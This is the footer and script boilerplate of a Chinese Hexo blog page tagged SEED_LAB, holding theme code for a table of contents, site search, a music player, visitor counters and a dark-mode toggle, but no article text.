                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/SEED-LAB/">
                        <span class="chip bg-color">SEED_LAB</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="2821652960"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2025-2026</span>
            
            <span id="year">2025</span>
            <a href="/about" target="_blank">Yssx</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            

            
                <script src='https://unpkg.com/mermaid/dist/mermaid.min.js'></script>
                <script>
                  if (window.mermaid) {
                    mermaid.initialize({theme: 'forest'});
                  }
                </script>
              
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/Yssx-g" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>









    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1740449925" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1740449925" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script type="text/javascript" src="\js\FunnyTitle.js"></script>
    
    <script>
        // 判断是否为暗色模式 (通常 Hexo 主题会将模式存储在 localStorage 中)
        var isDark = localStorage.getItem('isDark') === 'true';
        
        // 如果是暗色模式，使用浅灰色 (220,220,220)，否则使用原本的深灰色 (26,26,26)
        var color = isDark ? "255,255,255" : "26,26,26";
        
        var script = document.createElement("script");
        script.type = "text/javascript";
        script.src = "//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js";
        
        // 设置配置参数
        script.setAttribute("color", color);
        script.setAttribute("opacity", '0.6');
        script.setAttribute("zIndex", "-2");
        script.setAttribute("count", "200");
        
        document.body.appendChild(script);
    </script>
    
    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

	
    

    

    
    <script type="text/javascript" src="/libs/background/ribbon-dynamic.js" async="async"></script>
    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

    <script>
        function switchNightMode() {
          $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
            setTimeout(function () {
              $('body').hasClass('DarkMode') ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'),$('#nightMode').removeClass('fa-moon-o').addClass('fa-lightbulb-o')): ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#nightMode').removeClass('fa-lightbulb-o').addClass('fa-moon-o')),
                setTimeout(function () {
                  $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                    $(this).remove()
                  })
                }, 2e3)
            })
        }
        function switchNightModeTop() {
          $('body').hasClass('DarkMode') ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'),$('#nightMode').removeClass('fa-moon-o').addClass('fa-lightbulb-o')) : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#nightMode').removeClass('fa-lightbulb-o').addClass('fa-moon-o'))
        }
      </script>
      
      <script>
      if (localStorage.getItem('isDark') === '1') {
          ('body').addClass('DarkMode');
          }
          else if (new Date().getHours() >= 22 || new Date().getHours() < 7) {
          ('body').addClass('DarkMode');
          } 
          else if (matchMedia('(prefers-color-scheme: dark)').matches) {
          ('body').addClass('DarkMode');
          }
      </script>
      <a onclick="switchNightMode()" id="sma" title="切换主题">
          <i class="fa fa-lightbulb-o" id="nightMode"  aria-hidden="false"></i>
      </a>



<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":200,"height":400},"mobile":{"show":false},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>

</html>
